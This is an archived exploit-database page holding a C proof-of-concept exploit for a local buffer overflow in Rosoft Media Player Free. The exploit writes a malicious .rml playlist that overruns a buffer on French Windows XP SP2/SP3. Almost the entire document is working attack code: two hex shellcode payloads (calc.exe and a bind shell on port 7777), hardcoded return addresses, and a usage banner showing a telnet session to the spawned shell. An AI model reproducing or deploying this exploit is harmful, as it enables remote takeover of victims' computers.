SecurityvulnsSECURITYVULNS:DOC:21493rosoft media player local BOF exploit multi tagets
/* rsmpf.c
- Rosoft media player free local buffer overflow Exploit multi targets
- Coded By :
-
SimO-s0fT ([email protected]) - thanks To : Stack & fl0 fl0w & SKD
- and special thanks to str0ke for his advices and support ( you are the best brotha )
- example :
-
########################################################################################## # Coded By SimO-s0fT # -
# 0 [*]Microsoft Windows Trust SP3 (Frensh):ESP # -
# 1 [*]Microsoft Windows Trust SP2 (Frensh):ESP # -
# 2 [*]Microsoft Windows XP SP3 (Frensh) : ESP # -
# 3 [*]Microsoft Windows XP SP2 (Frensh) : ESP # -
# USAGE : # -
# exploit1.exe file.rml platform # -
# more information contact me { Maroc-anti-connexion[at]hotmail[dot]com } # -
# failed...: No such file or directory # -
# C:\Documents and Settings\The Fanopsis\Bureau>exploit1 simo.rml 0 # -
# [1] execute calc.exe # -
# [2] execute bindshell LPORT=7777 # -
# Choose a neumber : 2 # -
# simo.rml has been created! # -
# C:\Documents and Settings\The Fanopsis\Bureau>telnet 41.250.22.124 7777 # -
# Console - Windows Trust 3.0 (Service Pack 3: v55 # -
# # -
# (C) 1985-2008 Microsoft Corp. # -
# # -
# # -
# C:\Documents and Settings\The Fanopsis\Bureau> # -
##########################################################################################
********************************************************************************************************/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define OFFSET 4096
// calc (pour tester l'exploit)
char scode1[]=
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
"\x21\xdb\x5b\x83\xeb\xfc\xe2\xf4\x55\xc9\x9f\x5b\xa9\x21\x50\x1e"
"\x95\xaa\xa7\x5e\xd1\x20\x34\xd0\xe6\x39\x50\x04\x89\x20\x30\x12"
"\x22\x15\x50\x5a\x47\x10\x1b\xc2\x05\xa5\x1b\x2f\xae\xe0\x11\x56"
"\xa8\xe3\x30\xaf\x92\x75\xff\x5f\xdc\xc4\x50\x04\x8d\x20\x30\x3d"
"\x22\x2d\x90\xd0\xf6\x3d\xda\xb0\x22\x3d\x50\x5a\x42\xa8\x87\x7f"
"\xad\xe2\xea\x9b\xcd\xaa\x9b\x6b\x2c\xe1\xa3\x57\x22\x61\xd7\xd0"
"\xd9\x3d\x76\xd0\xc1\x29\x30\x52\x22\xa1\x6b\x5b\xa9\x21\x50\x33"
"\x95\x7e\xea\xad\xc9\x77\x52\xa3\x2a\xe1\xa0\x0b\xc1\xd1\x51\x5f"
"\xf6\x49\x43\xa5\x23\x2f\x8c\xa4\x4e\x42\xba\x37\xca\x0f\xbe\x23"
"\xcc\x21\xdb\x5b";
//bind shell LPORT 7777
char scode2[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x39\x4b\x4c\x32"
"\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x6f\x39\x6f\x35"
"\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x65\x47\x4c\x6e"
"\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x4b\x70\x4f\x65"
"\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x59\x4c\x4b\x46"
"\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x69\x4e\x4c\x4b"
"\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x6d\x43\x31\x48"
"\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x38\x42\x55\x4b"
"\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x66\x4e\x6b\x46"
"\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x4b\x65\x53\x34"
"\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x31\x4b\x73\x74"
"\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x4b\x67\x30\x46"
"\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x30\x44\x48\x71"
"\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x50\x4b\x4f\x4e"
"\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x32\x53\x58\x30"
"\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x50\x73\x58\x58"
"\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x76\x71\x4f\x6d"
"\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x32\x42\x75\x51"
"\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x49\x4b\x45\x6e"
"\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x73\x76\x33\x51"
"\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x70\x75\x36\x41"
"\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x71\x6c\x55\x70"
"\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x6f\x38\x56\x70"
"\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x38\x6c\x64\x4c"
"\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x53\x30\x55\x69"
"\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x39\x36\x37\x69"
"\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x4f\x5a\x70\x4f"
"\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x77\x4b\x4f\x4b"
"\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x44\x30\x66\x41"
"\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x70\x70\x59\x74"
"\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x39\x68\x62\x30"
"\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x6d\x49\x6e\x62"
"\x62\x36\x4c\x5a\x33\x6c\x4d\x71\x6a\x65\x68\x6e\x4b\x4c\x6b\x4e"
"\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x4f\x30\x75\x63"
"\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x41\x31\x41\x46"
"\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x71\x39\x6f\x48"
"\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x53\x39\x6f\x6b"
"\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x50\x4e\x6b\x50"
"\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x76\x41\x42\x49"
"\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x70\x42\x73\x49"
"\x6f\x58\x56\x49\x6f\x78\x50\x61";
struct adresses
{char platform;
unsigned long addr;
}
systems[]=
{
{"[]Microsoft Windows Trust SP3 (Frensh):ESP",0x7D60DECB },
{"[]Microsoft Windows Trust SP2 (Frensh):ESP",0x7C85D569 },
{"[]Microsoft Windows XP SP3 (Frensh) : ESP" ,0x7E498C6B },
{"[*]Microsoft Windows XP SP2 (Frensh) : ESP" ,0x7C82385D },
{NULL },
};
char NOP1[]="\x90\x90\x90\x90";// n0t working
char NOP2[]="\x90\x90\x90\x90\x90\x90\x90\x90";
int main(int argc,char *argv[]){
FILE *s;
unsigned char *buffer;
unsigned int RET= systems[atoi(argv[2])].addr;
unsigned char bchars[]="\xF0\xFF\xFD\x7F";
int i;
int number;
int offset=0;
if (argc <2){
system("cls");
printf("Coded By SimO-s0fT\n");
for(i=0;systems[i].platform;i++)
printf("%d \t\t %s\n",i,systems[i].platform);
printf("USAGE : \n\t");
printf(argv[0]);
printf(".exe ");
printf("file.rml ");
printf("platform\n");
printf("more information contact me { Maroc-anti-connexion[at]hotmail[dot]com }\n");
}
if ((s=fopen(argv[1],"wb"))==NULL){
perror("failed...");
exit(0);
}
printf("[1] execute calc.exe\n");
printf("[2] execute bindshell LPORT=7777\n");
printf(" Choose a neumber : ");
scanf("%d",&number);
switch(number){
case 1: buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1));
memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1));
offset=OFFSET;
memcpy(buffer+offset,bchars,strlen(bchars));
offset+=strlen(bchars);
memcpy(buffer+offset,NOP1,strlen(NOP1));
offset+=strlen(NOP1);
memcpy(buffer+offset,&RET,4);
offset+=4;
memcpy(buffer+offset,NOP2,strlen(NOP2));
offset+=strlen(NOP2);
memcpy(buffer+offset,scode1,strlen(scode1));
offset+=strlen(scode1);
fputs(buffer,s);
fclose(s);
printf("%s has been created!",argv[1]);
free(buffer);
break;
case 2: buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2));
memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2));
offset=OFFSET;
memcpy(buffer+offset,bchars,strlen(bchars));
offset+=strlen(bchars);
memcpy(buffer+offset,NOP1,strlen(NOP1));
offset+=strlen(NOP1);
memcpy(buffer+offset,&RET,4);
offset+=4;
memcpy(buffer+offset,NOP2,strlen(NOP2));
offset+=strlen(NOP2);
memcpy(buffer+offset,scode2,strlen(scode2));
offset+=strlen(scode2);
fputs(buffer,s);
fclose(s);
printf("%s has been created!",argv[1]);
free(buffer);
break;
}
return 0;
}